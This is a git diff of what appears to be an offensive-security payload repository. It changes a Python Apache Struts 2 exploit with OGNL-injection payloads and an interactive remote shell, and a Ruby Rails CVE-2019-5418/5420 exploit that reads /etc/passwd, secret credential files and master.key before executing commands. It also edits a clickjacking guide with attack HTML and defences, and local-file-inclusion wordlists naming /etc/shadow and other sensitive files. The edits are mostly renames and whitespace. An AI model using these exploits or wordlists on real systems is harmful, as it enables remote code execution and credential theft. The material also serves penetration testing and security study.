diff --git a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py b/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py index 6ef635d..eeded2a 100644 --- a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py +++ b/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py @@ -47,23 +47,23 @@ if len(host) > 0: poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}" - def exploit(commando): - exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+commando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" + def exploit(comando): + exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" return exploit - def exploit2(commando): - exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(commando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" + def exploit2(comando): + exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" return exploit2 - def exploit3(commando): - exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+commando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" + def exploit3(comando): + exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" return exploit3 def pwnd(shellfile): exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" return exploitfile - def validator(): + def validador(): arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"] return arr_lin_win @@ -101,10 +101,10 @@ if len(host) > 0: while 1: separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC) espacio = separador.split(' ') - commando = "','".join(espacio) + comando = "','".join(espacio) if espacio[0] != 'reverse' and espacio[0] != 'pwnd': - shell = urllib.request.urlopen(host+exploit("'"+str(commando)+"'")) + shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'")) print("\n"+shell.read()) elif espacio[0] == 'pwnd': pathsave=input("path EJ:/tmp/: ") @@ -122,8 +122,8 @@ if len(host) > 0: print(BLUE+" [-] NO VULNERABLE"+ENDC) print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC) x = 0 - while x < len(validator()): - valida = validator()[x] + while x < len(validador()): + valida = validador()[x] try: req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))}) @@ -149,7 +149,7 @@ if len(host) > 0: except: exit(0) else: - x = len(validator()) + x = len(validador()) else: print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) except: @@ -160,7 +160,7 @@ if len(host) > 0: print(BLUE+" [-] NO VULNERABLE"+ENDC) print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC) x = 0 - while x < len(validator()): + while x < len(validador()): #Filtramos la url solo dominio url = host.replace('#', '%23') url = host.replace(' ', '%20') @@ -174,7 +174,7 @@ if len(host) > 0: if (file_path == ''): file_path = '/' - valida = validator()[x] + valida = validador()[x] try: result = requests.get(site+"/"+exploit3(str(valida))+file_path).text @@ -194,13 +194,13 @@ if len(host) > 0: while 1: separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC) espacio = separador.split(' ') - commando = "%20".join(espacio) + comando = "%20".join(espacio) - shell = urllib.request.urlopen(host+exploit3(str(commando))) + shell = urllib.request.urlopen(host+exploit3(str(comando))) print("\n"+shell.read()) else: - x = len(validator()) + x = len(validador()) exit(0) else: print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) diff --git a/CVE Exploits/Rails CVE-2019-5420.rb b/CVE Exploits/Rails CVE-2019-5420.rb index 1823f82..647f03f 100644 --- a/CVE Exploits/Rails CVE-2019-5420.rb +++ b/CVE Exploits/Rails CVE-2019-5420.rb @@ -7,12 +7,12 @@ $proxy_addr = '127.0.0.1' $proxy_port = 8080 $remote = "http://172.18.0.3:3000" -$resource = "/demo" +$ressource = "/demo" puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n" print "[+] Checking if vulnerable to CVE-2019-5418 => " -uri = URI($remote + $resource) +uri = URI($remote + $ressource) req = Net::HTTP::Get.new(uri) req['Accept'] = "../../../../../../../../../../etc/passwd{{" res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| @@ -28,7 +28,7 @@ end print "[+] Getting file => credentials.yml.enc => " path = "../../../../../../../../../../config/credentials.yml.enc{{" for $i in 0..9 - uri = URI($remote + $resource) + uri = URI($remote + $ressource) req = Net::HTTP::Get.new(uri) req['Accept'] = path[3..57] res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| @@ -46,7 +46,7 @@ end print "[+] Getting file => master.key => " path = "../../../../../../../../../../config/master.key{{" for $i in 0..9 - uri = URI($remote + $resource) + uri = URI($remote + $ressource) req = Net::HTTP::Get.new(uri) req['Accept'] = path[3..57] res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| @@ -133,7 +133,7 @@ loop do if input == "R" print "[+] Getting result of command => " - uri = URI($remote + $resource) + uri = URI($remote + $ressource) req = Net::HTTP::Get.new(uri) req['Accept'] = "../../../../../../../../../../tmp/result.txt{{" res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| diff --git a/Clickjacking/README.md b/Clickjacking/README.md index a77c4a8..d6afb01 100644 --- a/Clickjacking/README.md +++ b/Clickjacking/README.md @@ -6,157 +6,190 @@ > that a normal user can do on a legitimate website can be done using clickjacking. ## Summary -* [Tools](#tools) -* [Methodology](#methodology) - * [UI Redressing](#ui-redressing) - * [Invisible Frames](#invisible-frames) - * [Button/Form Hijacking](#buttonform-hijacking) - * [Execution Methods](#execution-methods) -* [Preventive Measures](#preventive-measures) - * [Implement X-Frame-Options Header](#implement-x-frame-options-header) - * [Content Security Policy (CSP)](#content-security-policy-csp) - * [Disabling JavaScript](#disabling-javascript) -* [OnBeforeUnload Event](#onbeforeunload-event) -* [XSS Filter](#xss-filter) - * [IE8 XSS filter](#ie8-xss-filter) - * [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter) -* [Challenge](#challenge) -* [Practice Environments](#practice-environments) -* [Reference](#references) + +- [Tools](#tools) +- [Methodology](#methodology) + - [UI Redressing](#ui-redressing) + - [Invisible Frames](#invisible-frames) + - [Button/Form Hijacking](#buttonform-hijacking) + - [Execution Methods](#execution-methods) +- [Preventive Measures](#preventive-measures) + - [Implement X-Frame-Options Header](#implement-x-frame-options-header) + - [Content Security Policy (CSP)](#content-security-policy-csp) + - [Disabling JavaScript](#disabling-javascript) +- [OnBeforeUnload Event](#onbeforeunload-event) +- [XSS Filter](#xss-filter) + - [IE8 XSS filter](#ie8-xss-filter) + - [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter) +- [Challenge](#challenge) +- [Practice Environments](#practice-environments) +- [Reference](#references) ## Tools -* [Burp Suite](https://portswigger.net/burp) -* [OWASP ZAP](https://github.com/zaproxy/zaproxy) -* [Clickjack](https://github.com/machine1337/clickjack) + +- [Burp Suite](https://portswigger.net/burp) +- [OWASP ZAP](https://github.com/zaproxy/zaproxy) +- [Clickjack](https://github.com/machine1337/clickjack) ## Methodology ### UI Redressing -UI Redressing is a Clickjacking technique where an attacker overlays a transparent UI element on top of a legitimate website or application. -The transparent UI element contains malicious content or actions that are visually hidden from the user. By manipulating the transparency and positioning of elements, + +UI Redressing is a Clickjacking technique where an attacker overlays a transparent UI element on top of a legitimate website or application. +The transparent UI element contains malicious content or actions that are visually hidden from the user. By manipulating the transparency and positioning of elements, the attacker can trick the user into interacting with the hidden content, believing they are interacting with the visible interface. -* **How UI Redressing Works:** - * Overlaying Transparent Element: The attacker creates a transparent HTML element (usually a `
`) that covers the entire visible area of a legitimate website. This element is made transparent using CSS properties like `opacity: 0;`. - * Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it. - * Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element. - * User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations. + +- **How UI Redressing Works:** + - Overlaying Transparent Element: The attacker creates a transparent HTML element (usually a `
`) that covers the entire visible area of a legitimate website. This element is made transparent using CSS properties like `opacity: 0;`. + - Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it. + - Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element. + - User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations. + ```html -
+
Click me
``` ### Invisible Frames -Invisible Frames is a Clickjacking technique where attackers use hidden iframes to trick users into interacting with content from another website unknowingly. -These iframes are made invisible by setting their dimensions to zero (height: 0; width: 0;) and removing their borders (border: none;). + +Invisible Frames is a Clickjacking technique where attackers use hidden iframes to trick users into interacting with content from another website unknowingly. +These iframes are made invisible by setting their dimensions to zero (height: 0; width: 0;) and removing their borders (border: none;). The content inside these invisible frames can be malicious, such as phishing forms, malware downloads, or any other harmful actions. -* **How Invisible Frames Work:** - * Hidden IFrame Creation: The attacker includes an ` + ``` - * Loading Malicious Content: The src attribute of the iframe points to a malicious website or resource controlled by the attacker. This content is loaded silently without the user's knowledge because the iframe is invisible. - * User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe. - * Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent. - + - Loading Malicious Content: The src attribute of the iframe points to a malicious website or resource controlled by the attacker. This content is loaded silently without the user's knowledge because the iframe is invisible. + - User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe. + - Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent. ### Button/Form Hijacking + Button/Form Hijacking is a Clickjacking technique where attackers trick users into interacting with invisible or hidden buttons/forms, leading to unintended actions on a legitimate website. By overlaying deceptive elements on top of visible buttons or forms, attackers can manipulate user interactions to perform malicious actions without the user's knowledge. -* **How Button/Form Hijacking Works:** - * Visible Interface: The attacker presents a visible button or form to the user, encouraging them to click or interact with it. - ```html - - ``` - * Invisible Overlay: The attacker overlays this visible button or form with an invisible or transparent element that contains a malicious action, such as submitting a hidden form. - ```html - - ``` - * Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage. - ```html - -
- -
- - ``` + + ``` +- Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage. + ```html + +
+ +
+ + ``` ### Execution Methods -* Creating Hidden Form: The attacker creates a hidden form containing malicious input fields, targeting a vulnerable action on the victim's website. This form remains invisible to the user. + +- Creating Hidden Form: The attacker creates a hidden form containing malicious input fields, targeting a vulnerable action on the victim's website. This form remains invisible to the user. + ```html - -``` -* Overlaying Visible Element: The attacker overlays a visible element (button or form) on their malicious page, encouraging users to interact with it. When the user clicks the visible element, they unknowingly trigger the hidden form's submission. - * Example in javascript: - ```js - function submitForm() { - document.getElementById('hidden-form').submit(); - } + ``` +- Overlaying Visible Element: The attacker overlays a visible element (button or form) on their malicious page, encouraging users to interact with it. When the user clicks the visible element, they unknowingly trigger the hidden form's submission. + - Example in javascript: + +```js +function submitForm() { + document.getElementById("hidden-form").submit(); +} +``` ## Preventive Measures ### Implement X-Frame-Options Header + Implement the X-Frame-Options header with the DENY or SAMEORIGIN directive to prevent your website from being embedded within an iframe without your consent. + ```apache Header always append X-Frame-Options SAMEORIGIN ``` ### Content Security Policy (CSP) -Use CSP to control the sources from which content can be loaded on your website, including scripts, styles, and frames. + +Use CSP to control the sources from which content can be loaded on your website, including scripts, styles, and frames. Define a strong CSP policy to prevent unauthorized framing and loading of external resources. Example in HTML meta tag: + ```html - + ``` ### Disabling JavaScript -* Since these type of client side protections relies on JavaScript frame busting code, if the victim has JavaScript disabled or it is possible for an attacker to disable JavaScript code, the web page will not have any protection mechanism against clickjacking. -* There are three deactivation techniques that can be used with frames: - * Restricted frames with Internet Explorer: Starting from IE6, a frame can have the "security" attribute that, if it is set to the value "restricted", ensures that JavaScript code, ActiveX controls, and re-directs to other sites do not work in the frame. + +- Since these type of client side protections relies on JavaScript frame busting code, if the victim has JavaScript disabled or it is possible for an attacker to disable JavaScript code, the web page will not have any protection mechanism against clickjacking. +- There are three deactivation techniques that can be used with frames: + - Restricted frames with Internet Explorer: Starting from IE6, a frame can have the "security" attribute that, if it is set to the value "restricted", ensures that JavaScript code, ActiveX controls, and re-directs to other sites do not work in the frame. ```html ``` - * Sandbox attribute: with HTML5 there is a new attribute called “sandbox”. It enables a set of restrictions on content loaded into the iframe. At this moment this attribute is only compatible with Chrome and Safari. + - Sandbox attribute: with HTML5 there is a new attribute called “sandbox”. It enables a set of restrictions on content loaded into the iframe. At this moment this attribute is only compatible with Chrome and Safari. ```html ``` ## OnBeforeUnload Event -* The `onBeforeUnload` event could be used to evade frame busting code. This event is called when the frame busting code wants to destroy the iframe by loading the URL in the whole web page and not only in the iframe. The handler function returns a string that is prompted to the user asking confirm if he wants to leave the page. When this string is displayed to the user is likely to cancel the navigation, defeating target’s frame busting attempt. -* The attacker can use this attack by registering an unload event on the top page using the following example code: - ```html -

www.fictitious.site

- - +``` + +- The previous technique requires the user interaction but, the same result, can be achieved without prompting the user. To do this the attacker have to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting (for example every millisecond) a navigation request to a web page that responds with a _"HTTP/1.1 204 No Content"_ header.
_204 page:_ + ```php ``` + _Attacker's Page_ + ```js - ``` - Attacker View: - ```html - +
- + ``` + Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website. - ## Practice Environments -* [OWASP WebGoat](https://owasp.org/www-project-webgoat/) -* [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking) + +- [OWASP WebGoat](https://owasp.org/www-project-webgoat/) +- [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking) ## References -* [Clickjacker.io - Saurabh Banawar](https://clickjacker.io) -* [Web-Security Clickjacking - PortSwigger](https://portswigger.net/web-security/clickjacking) -* [Synopsis Clickjacking](https://www.synopsis.com/glossary/what-is-clickjacking.html#B) -* [OWASP - Gustav Rydstedt](https://owasp.org/www-community/attacks/Clickjacking) -* [SecTheory](http://www.sectheory.com/clickjacking.htm) + +- [Clickjacker.io - Saurabh Banawar](https://clickjacker.io) +- [Web-Security Clickjacking - PortSwigger](https://portswigger.net/web-security/clickjacking) +- [Synopsys Clickjacking](https://www.synopsys.com/glossary/what-is-clickjacking.html#B) +- [OWASP - Gustav Rydstedt](https://owasp.org/www-community/attacks/Clickjacking) +- [SecTheory](http://www.sectheory.com/clickjacking.htm) diff --git a/File Inclusion/Intruders/JHADDIX_LFI.txt b/File Inclusion/Intruders/JHADDIX_LFI.txt index 7bf7336..75b0632 100644 --- a/File Inclusion/Intruders/JHADDIX_LFI.txt +++ b/File Inclusion/Intruders/JHADDIX_LFI.txt @@ -209,9 +209,9 @@ d:\System32\Inetsrv\metabase.xml /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/acces_log -/etc/httpd/logs/access.log +/etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/acces_log -../../../../../../../etc/httpd/logs/access.log +../../../../../../../etc/httpd/logs/acces.log /etc/httpd/logs/access_log /etc/httpd/logs/access.log ../../../../../etc/httpd/logs/access_log diff --git a/File Inclusion/Intruders/List_Of_File_To_Include.txt b/File Inclusion/Intruders/List_Of_File_To_Include.txt index f07a1ba..0319724 100644 --- a/File Inclusion/Intruders/List_Of_File_To_Include.txt +++ b/File Inclusion/Intruders/List_Of_File_To_Include.txt @@ -3,12 +3,12 @@ \apache2\log\error_log \apache2\log\error.log /apache2/logs/access.log -/apache2/logs/access.log +/apache2/logs/access.log \apache2\logs\access_log \apache2\logs\access.log /apache2/logs/access.log%00 /apache2/logs/error.log -/apache2/logs/error.log +/apache2/logs/error.log \apache2\logs\error_log \apache2\logs\error.log /apache2/logs/error.log%00 @@ -18,21 +18,21 @@ \apache\log\error.log /apache/logs/access.log /apache/logs/access.log -/apache/logs/access.log +/apache/logs/access.log \apache\logs\access_log \apache\logs\access.log /apache/logs/access.log%00 /apache/logs/error.log /apache/logs/error.log -/apache/logs/error.log +/apache/logs/error.log \apache\logs\error_log \apache\logs\error.log /apache/logs/error.log%00 /apache\php\php.ini -/apache\php\php.ini +/apache\php\php.ini /apache\php\php.ini%00 /bin/php.ini -/bin/php.ini +/bin/php.ini /bin/php.ini%00 c:\apache\php\php.ini C:\apache\php\php.ini @@ -92,90 +92,90 @@ etc%5cpasswd%00 /etc/apache2/apache2.conf /etc/apache2.conf /etc/apache2/conf/httpd.conf -/etc/apache2/conf/httpd.conf +/etc/apache2/conf/httpd.conf /etc/apache2/conf/httpd.conf%00 /etc/apache2/httpd.conf -/etc/apache2/httpd.conf +/etc/apache2/httpd.conf /etc/apache2/httpd.conf%00 /etc/apache2/sites-available/default /etc/apache2/sites-enabled/000-default /etc/apache/apache.conf /etc/apache/conf/httpd.conf -/etc/apache/conf/httpd.conf +/etc/apache/conf/httpd.conf /etc/apache/conf/httpd.conf%00 /etc/apache/httpd.conf etc%c0%afpasswd etc%c0%afpasswd%00 /etc/chrootUsers -/etc/chrootUsers +/etc/chrootUsers /etc/chrootUsers%00 /etc/crontab /etc/fstab /etc/ftpchroot -/etc/ftpchroot +/etc/ftpchroot /etc/ftpchroot%00 /etc/ftphosts -/etc/ftphosts +/etc/ftphosts /etc/ftphosts%00 /etc/group -/etc/group +/etc/group /etc/group%00 /etc/hosts /etc/http/conf/httpd.conf -/etc/http/conf/httpd.conf +/etc/http/conf/httpd.conf /etc/http/conf/httpd.conf%00 /etc/httpd.conf -/etc/httpd.conf +/etc/httpd.conf /etc/httpd.conf%00 /etc/httpd/conf.d/php.conf /etc/httpd/conf/httpd.conf -/etc/httpd/conf/httpd.conf +/etc/httpd/conf/httpd.conf /etc/httpd/conf/httpd.conf%00 /etc/httpd/httpd.conf -/etc/httpd/httpd.conf +/etc/httpd/httpd.conf /etc/httpd/httpd.conf%00 /etc/httpd/logs/acces_log /etc/httpd/logs/acces_log -/etc/httpd/logs/access.log -/etc/httpd/logs/access.log +/etc/httpd/logs/acces.log +/etc/httpd/logs/acces.log /etc/httpd/logs/acces_log%00 -/etc/httpd/logs/access.log%00 +/etc/httpd/logs/acces.log%00 /etc/httpd/logs/access_log /etc/httpd/logs/access.log -/etc/httpd/logs/access.log +/etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error_log -/etc/httpd/logs/error_log +/etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/logs/error.log /etc/httpd/logs/error_log%00 /etc/httpd/logs/error.log%00 /etc/httpd/php.ini -/etc/httpd/php.ini +/etc/httpd/php.ini /etc/httpd/php.ini%00 /etc/http/httpd.conf -/etc/http/httpd.conf +/etc/http/httpd.conf /etc/http/httpd.conf%00 /etc/inittab /etc/issue -/etc/issue +/etc/issue +/etc/logrotate.d/ftp /etc/logrotate.d/ftp -/etc/logrotate.d/ftp /etc/logrotate.d/ftp%00 /etc/logrotate.d/proftpd -/etc/logrotate.d/proftpd +/etc/logrotate.d/proftpd /etc/logrotate.d/proftpd%00 /etc/logrotate.d/vsftpd.log -/etc/logrotate.d/vsftpd.log +/etc/logrotate.d/vsftpd.log /etc/logrotate.d/vsftpd.log%00 /etc/master.passwd /etc/motd -/etc/motd +/etc/motd +/etc/my.cnf /etc/my.cnf -/etc/my.cnf /etc/my.cnf%00 /etc/mysql/my.cnf -/etc/mysql/my.cnf +/etc/mysql/my.cnf /etc/mysql/my.cnf%00 /etc/nginx.conf /etc/nginx/nginx.conf @@ -184,125 +184,125 @@ etc%c0%afpasswd%00 /etc/pam.d/proftpd /..\..\\..\..\\..\..\\..\..\\\/etc/passwd /etc/passwd -/etc/passwd +/etc/passwd /etc/passwd%00 etc/passwd%00 /etc/php4.4/fcgi/php.ini -/etc/php4.4/fcgi/php.ini +/etc/php4.4/fcgi/php.ini /etc/php4.4/fcgi/php.ini%00 /etc/php4/apache2/php.ini -/etc/php4/apache2/php.ini +/etc/php4/apache2/php.ini /etc/php4/apache2/php.ini%00 /etc/php4/apache/php.ini -/etc/php4/apache/php.ini +/etc/php4/apache/php.ini /etc/php4/apache/php.ini%00 /etc/php4/cgi/php.ini -/etc/php4/cgi/php.ini +/etc/php4/cgi/php.ini /etc/php4/cgi/php.ini%00 /etc/php5/apache2/php.ini -/etc/php5/apache2/php.ini +/etc/php5/apache2/php.ini /etc/php5/apache2/php.ini%00 /etc/php5/apache/php.ini -/etc/php5/apache/php.ini +/etc/php5/apache/php.ini /etc/php5/apache/php.ini%00 /etc/php5/cgi/php.ini -/etc/php5/cgi/php.ini +/etc/php5/cgi/php.ini /etc/php5/cgi/php.ini%00 /etc/php/apache2/php.ini -/etc/php/apache2/php.ini +/etc/php/apache2/php.ini /etc/php/apache2/php.ini%00 /etc/php/apache/php.ini -/etc/php/apache/php.ini +/etc/php/apache/php.ini /etc/php/apache/php.ini%00 /etc/php/cgi/php.ini -/etc/php/cgi/php.ini +/etc/php/cgi/php.ini /etc/php/cgi/php.ini%00 /etc/php.ini -/etc/php.ini +/etc/php.ini /etc/php.ini%00 /etc/phpmyadmin/config.inc.php /etc/php/php4/php.ini -/etc/php/php4/php.ini +/etc/php/php4/php.ini /etc/php/php4/php.ini%00 /etc/php/php.ini -/etc/php/php.ini +/etc/php/php.ini /etc/php/php.ini%00 /etc/proftp.conf -/etc/proftp.conf +/etc/proftp.conf /etc/proftp.conf%00 /etc/proftpd/modules.conf -/etc/proftpd/modules.conf +/etc/proftpd/modules.conf /etc/proftpd/modules.conf%00 /etc/protpd/proftpd.conf -/etc/protpd/proftpd.conf +/etc/protpd/proftpd.conf /etc/protpd/proftpd.conf%00 /etc/pure-ftpd.conf -/etc/pure-ftpd.conf +/etc/pure-ftpd.conf /etc/pure-ftpd.conf%00 /etc/pureftpd.passwd -/etc/pureftpd.passwd +/etc/pureftpd.passwd /etc/pureftpd.passwd%00 /etc/pureftpd.pdb -/etc/pureftpd.pdb +/etc/pureftpd.pdb /etc/pureftpd.pdb%00 /etc/pure-ftpd/pure-ftpd.conf -/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.conf%00 /etc/pure-ftpd/pure-ftpd.pdb -/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb /etc/pure-ftpd/pureftpd.pdb -/etc/pure-ftpd/pureftpd.pdb /etc/pure-ftpd/pure-ftpd.pdb%00 /etc/pure-ftpd/pureftpd.pdb%00 /etc/redhat-release /etc/release /etc/security/environ -/etc/security/environ +/etc/security/environ /etc/security/environ%00 /etc/security/group -/etc/security/group +/etc/security/group /etc/security/group%00 /etc/security/limits -/etc/security/limits +/etc/security/limits /etc/security/limits%00 /etc/security/passwd -/etc/security/passwd +/etc/security/passwd /etc/security/passwd%00 /etc/security/user -/etc/security/user +/etc/security/user /etc/security/user%00 /etc/shadow /etc/shadow~ -/etc/shadow +/etc/shadow /etc/shadow%00 /etc/ssh/sshd_config /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/vhcs2/proftpd/proftpd.conf -/etc/vhcs2/proftpd/proftpd.conf +/etc/vhcs2/proftpd/proftpd.conf /etc/vhcs2/proftpd/proftpd.conf%00 /etc/vsftpd.chroot_list -/etc/vsftpd.chroot_list +/etc/vsftpd.chroot_list /etc/vsftpd.chroot_list%00 /etc/vsftpd.conf -/etc/vsftpd.conf +/etc/vsftpd.conf /etc/vsftpd.conf%00 /etc/vsftpd/vsftpd.conf -/etc/vsftpd/vsftpd.conf +/etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf%00 /etc/wu-ftpd/ftpaccess -/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftpaccess%00 /etc/wu-ftpd/ftphosts -/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftphosts%00 /etc/wu-ftpd/ftpusers -/etc/wu-ftpd/ftpusers +/etc/wu-ftpd/ftpusers 